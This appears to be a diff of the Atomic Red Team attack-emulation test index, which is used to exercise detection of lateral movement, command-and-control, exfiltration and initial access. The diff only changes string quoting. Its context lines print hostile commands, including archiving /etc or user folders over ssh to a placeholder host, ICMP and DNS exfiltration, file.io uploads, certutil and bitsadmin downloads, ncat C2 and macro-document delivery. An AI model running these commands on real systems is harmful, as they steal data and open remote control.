lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. - ' +' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt - ' +' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares - ' +' supported_platforms: - windows input_arguments: @@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" - ' +' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} - ' +' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). - ' +' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 - ' +' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: @@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force - ' +' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} - ' +' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} - ' +' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} - ' +' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' - ' +' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! - ' +' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} - ' +' cleanup_command: 'del #{local_path} >nul 2>&1 - ' +' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! - ' +' supported_platforms: - windows input_arguments: @@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} - ' +' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") - ' +' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. - ' +' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility - ' +' supported_platforms: - linux - macos @@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present - ' +' prereq_command: 'which whois && which timeout - ' +' get_prereq_command: 'echo "Please install timeout and the whois package" - ' +' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} - ' +' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} - ' +' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) - ' +' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} - ' +' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} - ' +' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. - ' +' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} - ' +' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } - ' +' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b @@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. - ' +' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks - ' +' supported_platforms: - macos - linux @@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 - ' +' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; - ' +' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz - ' +' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' - ' +' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) - ' +' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} - ' +' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - windows input_arguments: @@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. - ' +' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } - ' +' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. - ' +' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore - ' +' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | @@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell T1566.002: technique: